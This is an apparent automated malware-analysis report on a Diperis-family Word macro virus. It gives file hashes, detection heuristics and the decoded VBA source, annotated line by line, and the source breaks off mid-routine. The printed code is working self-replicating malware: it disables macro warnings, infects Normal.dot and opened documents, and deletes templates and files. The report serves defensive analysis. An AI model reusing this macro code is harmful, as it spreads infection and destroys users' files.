Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e67ddb3ae666cf0…

MALICIOUS

Office (OLE)

41.0 KB Created: 2004-07-20 12:55:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 3be6a329b6ca474561add54c52dd7e28 SHA-1: ee0d23b4b57dbbbb6c2c6ab0608e08ad27df9f7e SHA-256: 1e67ddb3ae666cf051e1a44726528dcc971c8f45d31b13b93eea905c3b179133
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The extracted VBA source (macros.bas, below) is a self-replicating Word macro virus of the Diperis family rather than pure legacy WordBasic: it uses the Word 97+ object model (Options, CommandBars, VBProject.VBComponents) and calls WordBasic.DisableAutoMacros only to toggle auto-macros. On AutoOpen it turns off Word's macro warning (Options.VirusProtection = False) and the Normal-template save prompt, copies its own "Word97" module into Normal.dot and saves it (A2N/Infect; ATT&CK T1137.001 Office Template Macros, T1562.001 Impair Defenses), and N2A — truncated in the preview but called from AutoOpen and the FileOpen hook with NormalTemplate as source and ActiveDocument as target — appears to copy it back into each document. Posing as a macro scanner with Indonesian message boxes ("File diperiksa" = "file checked", "Ditemukan macro" = "macro found", "bebas dari macro" = "free of macros"), WAntidot exports every other VBA module to c:\my documents\<name>m2r.txt, removes it from the document and from Normal.dot, deletes every global template in the Office StartUp folder plus a fixed list of hard-coded files (C:\WINDOWS\FAQ.doc, excel2r.xls in two XLSTART locations, C:\windows.reg, C:\fix.bat, C:\sex.txt.vbs), and re-enables the menu bar and VBA toolbars. A Sub named FileOpen presumably intercepts Word's built-in File > Open command while the infected Normal.dot is loaded. No downloader, dropper or external payload stage is present in the recovered source; the AutoOpen macro, Normal.dot persistence and the ClamAV detection are what establish malicious intent.

Heuristics 4

  • ClamAV: Doc.Virus.Diperis-6922877-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Virus.Diperis-6922877-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: for this sample the description conflicts with the extracted artifact below — a VBA project was recovered (macros.bas, 4,296 bytes of decoded source containing AutoOpen and WordBasic.DisableAutoMacros calls) — so treat this finding as corroborating OLE_VBA_AUTOOPEN rather than as evidence that no VBA project exists.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4296 bytes
SHA-256: 5d6dedbc8f10e79014ab9ad1465e5c733a9172732cdd98ad95001ef90878d194
Preview script
First 1,000 lines of the extracted script
' Module attribute header of the document's "ThisDocument" class module, as
' decoded by olevba. VB_Base = "1Normal.ThisDocument" and
' VB_TemplateDerived = True record that the document was created from the
' Normal template; the extraction concatenates both recovered modules.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Second module, "Word97": the viral code. A2N/N2A/Infect copy this module by
' name between the active document and Normal.dot; everything below belongs to it.
Attribute VB_Name = "Word97"

' WAntidot ("antidote"): the virus's fake "macro cleaner". Disables Word's macro
' warning and save prompts, re-enables the VBA toolbars, deletes a fixed list of
' files, installs this module into Normal.dot (A2N), then exports and removes
' every other VBA module from the active document and from Normal.dot while
' showing Indonesian "scan" message boxes. Called from AutoOpen and from the
' FileOpen hook. No parameters, no return value.
Sub WAntidot()
    ' Suppress the "save changes to Normal?" prompt so template changes go unnoticed.
    Options.SaveNormalPrompt = False
    ' Turn off Word's built-in macro warning (Tools > Macro > Security in later versions).
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
    ' Re-enable the menu bar and the forms/ActiveX/VBA toolbars. Why they would be
    ' disabled is not visible here — presumably undoing another macro virus; TODO confirm.
    CommandBars.ActiveMenuBar.Enabled = True
    CommandBars("Control Toolbox").Enabled = True
    CommandBars("Forms").Enabled = True
    CommandBars("ActiveX Control").Enabled = True
    CommandBars("Visual Basic").Enabled = True
    ' From here on every error (missing file, access denied, VBProject blocked) is skipped.
    On Error Resume Next
    ' Delete every global template in the Office StartUp folder — this also removes
    ' legitimate add-in templates. All paths are hard-coded, English-locale, single-drive.
    Kill "C:\Program Files\Microsoft Office\Office\StartUp\*.dot"
    ' Fixed list of files deleted; the names suggest other macro/script malware of
    ' the same era, but nothing in this sample establishes what they are — TODO confirm.
    Kill "C:\WINDOWS\FAQ.doc"
    Kill "C:\WINDOWS\Application Data\Microsoft\Excel\XLSTART\excel2r.xls"
    Kill "C:\Program Files\Microsoft Office\Office\XLStart\excel2r.xls"
    Kill "C:\windows.reg"
    Kill "C:\fix.bat"
    Kill "C:\sex.txt.vbs"
' Copy this module into Normal.dot before "scanning" (see A2N).
A2N
' z: 1-based running index into the document's VBComponents collection.
z = 0
' "File diperiksa : <name> !" = Indonesian "File checked : <name> !" (fake scanner UI).
p = MsgBox("File diperiksa : " + ActiveDocument.Name + " !")
On Error Resume Next
For Each obj In ActiveDocument.VBProject.VBComponents
           z = z + 1
     ' Leave the virus's own modules alone ("lompat" = "jump", i.e. skip).
     If obj.Name = "Word97" Or obj.Name = "ThisDocument" Then
     GoTo lompat
     End If
            ' NOTE(review): Item(z) assumes enumeration order matches the 1-based index;
            ' after a Remove below the collection shrinks while z keeps counting, so mok
            ' can diverge from obj. Any resulting error is masked by On Error Resume Next.
            Set mok = ActiveDocument.VBProject.VBComponents.Item(z)
            xx = mok.CodeModule.CountOfLines
            xy = Int(xx / 25) + 1
            x = 0
            xyz = 1
            ' "Ditemukan macro : <name> !" = "Macro found : <name> !".
            p = MsgBox("Ditemukan macro : " + obj.Name + " !")
            ' Reads the foreign module in 25-line chunks into xad1, which is never used —
            ' the loop has no visible effect (leftover or decoy; intent not determinable here).
            While x < xy
            xad1 = mok.CodeModule.Lines(xyz, 25)
            x = x + 1
            xyz = xyz + 25
            Wend
            ' Forensic artifact: each removed module is exported as
            ' c:\my documents\<module name>m2r.txt before deletion.
            ActiveDocument.VBProject.VBComponents(z).export "c:\my documents\" & obj.Name & "m2r.txt"
            ActiveDocument.VBProject.VBComponents.Remove ActiveDocument.VBProject.VBComponents(obj.Name)
lompat:
 Next obj
    On Error Resume Next
    ' Strip everything except the virus's own modules from Normal.dot as well.
    For Each obj In NormalTemplate.VBProject.VBComponents
        If obj.Name <> "Word97" And obj.Name <> "ThisDocument" Then
            NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents(obj.Name)
        End If
    Next obj
    ' "File : <name> bebas dari macro !" = "File : <name> is free of macros !".
    p = MsgBox("File : " + ActiveDocument.Name + " bebas dari macro !")
End Sub
' FileOpen: a Sub carrying the name of Word's built-in File > Open command. Word
' runs a macro named after a built-in command in place of that command, so this
' presumably hooks every File > Open while the infected template is loaded.
' Shows the normal Open dialog; unless the user cancels, runs the "cleaner" on
' the opened document and then copies the virus into it from Normal.dot (N2A).
Sub FileOpen()
    ' Keep AutoOpen etc. from firing for the document the dialog opens.
    WordBasic.DisableAutoMacros True
    On Error Resume Next
    ' Show returns 0 when the dialog is cancelled; anything else means a document was opened.
    If Dialogs(wdDialogFileOpen).Show <> 0 Then
    WAntidot
    End If
    ' Normal.dot -> active document (N2A), so the newly opened file is infected.
    N2A
    WordBasic.DisableAutoMacros False
End Sub
' AutoOpen: Word runs this automatically when the document is opened. Infection
' entry point: document -> Normal.dot (A2N), fake clean-up (WAntidot), then
' Normal.dot -> document (N2A), with auto-macros disabled for the duration.
Sub AutoOpen()
    ' Disabling auto-macros presumably prevents nested auto-macro runs while the
    ' template is modified and saved — not confirmed from the visible code.
    WordBasic.DisableAutoMacros True
    ' Errors raised inside the called procedures resume at the next line here.
    On Error Resume Next
    A2N
    WAntidot
    N2A
    WordBasic.DisableAutoMacros False
End Sub
' A2N ("Active -> Normal"): persistence step. Removes every foreign module from
' Normal.dot, copies this document's "Word97" module into it if it is not
' already there (Infect), and saves the template so the virus loads with every
' later Word session (ATT&CK T1137.001).
Sub A2N()
' NOTE(review): no declaration of TempPath is visible in the extracted source. If it
' is not a module-level variable, this is an implicit local and the TempPath read by
' Infect is an empty string — confirm against the full module header.
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = ActiveDocument
Set Target = NormalTemplate
' sehat ("healthy") = True once the Word97 module is found in Normal.dot.
sehat = False
For Each obj In Target.VBProject.VBComponents
      If obj.Name = "Word97" Then sehat = True
      ' Delete every other module (objKorban, "victim", is set but never read here).
      If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
            Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
            objKorban = True
            End If
            Next obj
      ' Only infect once; x receives Infect's Boolean result but is never checked.
      If sehat = False Then
    x = Infect(Sumber, Target, "Word97")
    End If
    ' No handler is active above this line: an error in the loop or in Infect
    ' propagates to the caller (AutoOpen/FileOpen) and skips the rest of A2N.
    On Error Resume Next
    ' Writes the modified Normal.dot to disk — the persistence artifact to check.
    NormalTemplate.Save
End Sub

' Infect: copies VBA module `obj` from project `Sumber` ("source") into project
' `Target` by exporting it to a temp file (TempPath & obj) and importing it.
' Returns True on success, False (the default) if any step raised an error.
' Relies on TempPath being set by the caller/module; see the note in A2N.
Function Infect(Sumber, Target, obj As String) As Boolean
' Any error jumps to ILari ("run away"), which simply falls off the end.
On Error GoTo ILari
    Sumber.VBProject.VBComponents(obj).export TempPath & obj
    Target.VBProject.VBComponents.Import TempPath & obj
    Infect = True
    ' Forensic note: if Import fails, execution jumps past this Kill and the exported
    ' module is left on disk as a file named after obj (e.g. "Word97") in TempPath.
    Kill TempPath & obj
Exit Function
ILari:
End Function

Sub N2A()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = NormalTemplate
Set Target = ActiveDocument
sehat = False
For Each obj In Target.VBProject.VBComponents
      If obj.Name = "Word97" Then sehat = True
      If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
            Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
            objK
... (truncated)